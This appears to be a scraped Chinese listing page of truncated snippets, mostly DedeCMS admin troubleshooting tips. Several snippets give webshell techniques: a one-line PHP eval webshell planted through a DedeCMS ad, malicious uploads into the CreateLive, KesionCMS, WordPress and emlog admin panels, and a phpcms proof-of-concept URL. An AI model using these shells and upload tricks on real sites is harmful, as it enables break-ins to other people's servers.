遇到一个被阉割的后台,发现直接传shell显然不行. 然后就有了下文 添加一个新广告. 插入一句话木马: --><?php $_GET[c]($_POST[x]);?><!-- 然后访问: /plus/ad_js.php?aid=42&c=assert aid后面的值是你广告的id.…

dede后台无法写新文章也无法编辑以前的文档,文章编辑的地方无法写入,出现无法显示该页面的问题,这是怎么回事?我的dede在ftp中换过文件夹,是不是跟这个有关?该如何解决这个问题? 以下修改是针对dedecms 后台发布后的文章不能进行编辑修改,点击编辑出现一片空白的解决办法希望能帮助的大家! 找到该文件dede/archives_do.php大约在39行(dede5.7版本)if($dopost=='editArchives'){ $query = "SELECT arc.id,arc.ty…

验证码不正确解决方法 分为两类解决方法 第一类:取消掉验证码,直接登录 第二类:修复验证码,回复验证码功能 四种常见的处理办法如下: 第一种:取消掉验证码具体方法如下 实现的方法一共分为两步来进行: 打开dede目录下的 login.php 找到: if($validate==" || $validate != $svali) 替换为: if( false ) 然后,在模板dede/templets/login.htm里去掉以下验证码的具体HTML代码: <li><span&g…

DEDECMS怎么样能快捷或者批量修改网站所有文章的超链接和锚文本,超链和所有关键词锚文本的链接需要修改? dedecms后台批量替换文章中的关键词…

dedecms后台验证有时间输入总是不对,有时候却不显示,而输入验证码无疑是一个麻烦的过程,那么我们怎么样来去除后台验证码,实现输入帐号密码直接登录呢?我来为大家介绍一下: 让人感到烦恼的情况出现了!!! 如果你的网站管理系统已经升级到了dede5.6以上版本,那么织梦管理后台验证码不显示这个情况也非常容易解决,在DedeV5.6新版中,统一将验证码的有效设置[系统]→[验证码安全设置]里,可以设置哪些地方启用验证码,哪些地方不启用.还可以设置验证码类型,比如数字,英文与单词. 但之前的版本在系…

dedecms发文章不自动更新首页也列表页解决办法如下: 登陆dedecms后台,找到“系统”“系统基本参数”“性能选项”,把“arclist标签调用缓存”设置成0,然后把“发布文章后马上更新网站主页”和“发布文章后马上更新相关栏目”单选框选为[是]即可 设置完成后在生成里面更新首页和栏目页就可以了.…

Title:CreateLiveCMSV4.0 漏洞,无需后台Get shell --2012-03-06 17:28 标题:CreateLive CMS Version 4.0.1006 漏洞,无需后台 Get shell 必须环境:IIS6,上传目录可执行脚本 CreateLive CMS Version 4.0.1006 是个非常古老滴CMS了. ------------------------------------------------------------------------…

Title:KesionCMS V6.5后台拿SHELL方法  --2011-03-29 00:21 最近弄一个站点,是KesionCMS V6.5的WEB系统,试了下后台拿webshell方法,记下来. 1. 新建x.asp用户再结合IIS的文件夹解析漏洞,是可以拿到SHELL的,前提是没有禁止.asp目录的访问,我弄的目标站,不允许访问.asp这样的目录下面的文件的. 2. 后台SQL执行导出webshell 理论上是可以的,我在本地可以导出ok.asp;o.xls这样的文件的.但是TXT文…

下面由做网站为大家来介绍dedecms后台添加新变量和删除变量的方法 添加新变量是做什么用的?答:可以在模板内调用的东东. 一.进入网站织梦(Dedecms)后台(以dede5.5为例),依次打开系统--系统基本参数-添加新变量,看到如下图(一): 图一(请点击放大) 变量名称:指调用的函数,请填写以cfg_开头的英文或数字. 变量值:指输入框填写的内容,例:关注站长,关注互联网! 变量类型:指文字,数字之类,这个不用细讲了吧?如果内容较长,您可以选择多行文本. 参数说明:指中文的命名,就是日后…

使用织梦cms有很多的功能,其中有一个是在dedecms后台添加发布软件,然后在前台大家可以直接下载软件,在织梦cms后台怎么添加发布软件呢?下面是织梦软件内容管理的主要操作步骤. 使用织梦cms有很多的功能,其中有一个是在dedecms后台添加发布软件,然后在前台大家可以直接下载软件,在织梦cms后台怎么添加发布软件呢?下面是织梦软件内容管理的主要操作步骤. 1.  新建软件栏目 在发布软件文档之前,我们先来建一个软件栏目.进入后台,单击核心,再单击网站栏目管理后面的添加栏目按钮,操作如图1所…

1.织梦dedecms后台文章搜索功能在哪里找?织梦dedecms后台-->核心-->常用操作-->所有档案列表(或)织梦dedecms后台-->核心-->内容管理-->普通文章依次点击后可以看到文章列表,在文章列表下边就是我们要找的文章搜索了2.织梦dedecms后台的文章搜索功能只能搜索到标题和作者里的关键字,却不能搜索到正文内容中包含该关键字的文章,其实是可以在后台输入关键字搜索时,找到正文内容里包含该关键字的文章的,具体方法如下.打开 dede后台目录/cont…

我们在迁移网站的时候,可能会出现DedeCMS后台500错误,有可能是因为dedecms不支持PHP5.3.5.4及以上版本,这时我们要改动一些设置才能修复成功.跟着ytkah来修改配置文件吧.首先打开 include/userlogin.class.php这个文件,在287行到308行原内容如下: @session_register($this->keepUserIDTag); $_SESSION[$this->keepUserIDTag] = $this->userID; @sess…

前面dedecms后台左侧菜单空白不显示怎么处理,但有些网友还是反应说不能显示,提示500错误,这可能是iis配置或apache设置不正确有关,一般是正常的.但是,既然问题出现了,我们还是要去解决.下面就随着ytkah一起去探索一下. 首先我们先看看左侧菜单是在哪个文件,通过观察我们找到了/dede/index_menu.php,但是这个文件是调用集合 最主要的是图中箭头两个文件,/inc/inc_menu.php和/inc/inc_menu_func.php,预知如何修改请加微信咨询 还有一个…

我们在建站时有的时候发现之前的文章有错误了,要进行修改,但又不知道文章名,只知道大概的文章id,那么可以搜索到DedeCms后台文章列表文档id吗?或者快速定位文章id方便修改? 第一种方法:复制下面的链接地址,直接修改文章id(aid=1183这个数字),就进入文章编辑页面了 http://www.*.com/dede/archives_do.php?aid=1183&dopost=editArchives 第二种方法:后台那边添加搜索文档id功能,打开文件/dede/content_list…

dedecms  后台登录地址 http://www.域名.com/member/index.php…

下载后解压,根据自己语言版本,把文件radminpass.php放入网站根目录下执行即可 点击下载:织梦dedecms后台登陆密码充值工具…

刚安装完dedecms,兴致冲冲的准备进后台,输入完用户名和密码后,页面 中显示一片空白. 立马到网上搜搜,发现大家各抒己见,但是都没有解决问题. 不过,下面的这个方法是可以的.马上记录下来,以备其他人遇到类似的问题做参考. 找include/userlogin.class.php里面的 keepuser()函数, 把@session_register($this->keepUserIDTag);    注释掉,然后改为 if (!isset($_SESSION[$this->keepUser…

appium 在后台运行,把启动appium命令保存为一个shell文件,文件名包含appium,如start_appium.sh.由于启动前要杀掉已经启动的appium服务, BUILD_ID=dontKillMe #防止执行脚本被杀死 #杀已经启动的appium nohup appium --address --session-override --platform-name Android --platform-version --automation-name Appium --log-…

闲着没事搭建了一套最新版wordpress 5.1,本身wordpress后台安全防御是比较差的,想尝试下后台是否可以拿shell. 再上传插件的地方可以直接上传php文件,并且该文件可以执行: shell地址为:http://192.168.62.130/wordpress/wp-content/uploads/2019/03/9.php,其中2019/03为上传shell的年月份…

小明在学习采集,弄了个dedecms作为发布平台,几个小时后跑来报喜说好简单,但又不想制造那么多spam,每个分类只保留几条就好.在后台删除这些文章,每页只显示30个,看了下有100多页,立马沮丧了,数据库批量删除又不会.问我要怎么修改“文档列表”每一页显示的文档条数. 打开这个文件dede/content_list.php(dede是后台目录,一般会改名),找到$dlist->pageSize = 30;将默认的30改为300,以后打开文章列表每页就显示300条了,数字可以自行设置,but设置…

在使用织梦Dedecms的过程中,我们会遇到模块管理列表无法显示的问题,造成织梦模块管理列表无法显示的原因,可能有很多种,现小编总结了遇到过的一种方法仅供参考. 方法步骤一: 由于/data/module/moduleurllist.txt模块列表文件没有内容,造成模块列表空白. 解决的方法是打开/dede/module_main.php文件(其中dede为您的后台管理目录),注释掉大约91行和95行的如下代码: $modules_remote = $dm->GetModuleUrlList($…

dedecms默认是所有的功能几乎只要用到验证码的地方我们都需要验证的,如果要关闭一些验证功能我们可以参考下面的教程,这里介绍了关闭后台,留言板,会员系统等验证码功能关闭了.提示:支持DedeCMS V5.6 以上的所有版本取消后台登录验证码打开/data/safe/inc_safe_config.php文件,找到如下代码:$safe_gdopen = '1,2,3,4,5,6';数字6 代表是后台验证码,数字3是会员系统里面的验证码.删除对应的数字,即可以关闭对应的验证码 取消会员登录验证码打…

前台调用栏目时需要显示图标,整理一下: 第一步:“系统->SQL命令工具” , 插入sql语句 alter table dede_arctype add typeimg varchar() 第二步:进入后台管理文件目录(默认为:dede目录),找到”catelog_add.php“下的 228行,把下面的替换默认的(在SQL语句添加了”typeimg“) $in_query = "INSERT INTO `#@__arctype`(reid,topid,sortrank,typename,…

在使用织梦模板时发现这样一个问题:在后台预览文章的时候,出现的文章网址尽管是静态URL,但是会在网址的尾部出现问号并跟随一个时间戳,在复制URL时就显得很不方便.那么如何解决这一问题呢? 经过查找资料,终于找到了解决的方法. 通过FTP打开dede(CMS后台目录,一般都修改为其它名称)目录,编辑archives_do.php文件. 查找以下代码: echo "<script language='javascript'>location.href='$arcurl".&qu…

问题症状:V5.7登录后台后,发布英文标题没问题,发布中文会提示“标题不能为空”. 问题根源:htmlspecialchars在php5.4默认为utf8编码,gbk编码字符串经 htmlspecialchars 转义后的中文字符串为空,也就是标题为空. 解决办法:给htmlspecialchars添加ENT_COMPAT ,'GB2312'参数修改编码默认值. 具体修改页面: 1.dede/article_add.php 和 dede/article_edit.php将$title = htm…

问题症状:V5.7登录后台后,发布英文标题没问题,发布中文会提示“标题不能为空”. 问题根源:htmlspecialchars在php5.4默认为utf8编码,gbk编码字符串经 htmlspecialchars 转义后的中文字符串为空,也就是标题为空. 解决办法:给htmlspecialchars添加ENT_COMPAT ,'GB2312'参数修改编码默认值. 具体修改页面: 1.dede/article_add.php 和 dede/article_edit.php 将 $title = h…

参考url:https://xianzhi.aliyun.com/forum/read/1507.html poc:index.php??m=content&c=content&a=public_categorys&menuid=${@phpinfo()} 根据拿到的poc,phpcms的mvc结构,代码位于/phpcms/modules/content/content.php  第472-532行 public function public_categorys() { $sho…

原因之一: 加载后台信息的时候  耗费的时间太长. 如果不关注这边的数据, 可以将他们删除掉. 删除  “信息统计”   : 找到   www.yoursite.com/dede/js/indexbody.js 将: window.onload = function() { // var myajax = new DedeAjax($DE('listCount')); // myajax.SendGet('index_body.php?dopost=getRightSide'); }; 删除 …

PS:前提是要有IIS6.0的析漏洞 网上我找了好一会儿没有找到.直奔主题.至于怎么弄到密码,全靠坑蒙拐骗. 系统设置=>模板标签管理=>模板管理 然后选则上传模板(如果新建的话会被限制掉,会被说不允许出现小数点,分号之类的敏感符号.) 我上传了一个qwe.asp;.html 尝试了好几个都不行,是在WAP系统模板下可以,不知道是权限还是啥缘故.大家自己测试哈. shell地址:http://www.xxxx.cn/Template/Default/模板库_GWZJhX/WAP系统模板/qwe…

emlog版本:5.3.1 先本地弄好shell 新建一个文件夹,里面放shell,shell名称和文件名要一致.压缩为zip 然后在安装插件处上传. 成功后的路径content/plugins/test/test.php这个是主题包的路径 over.…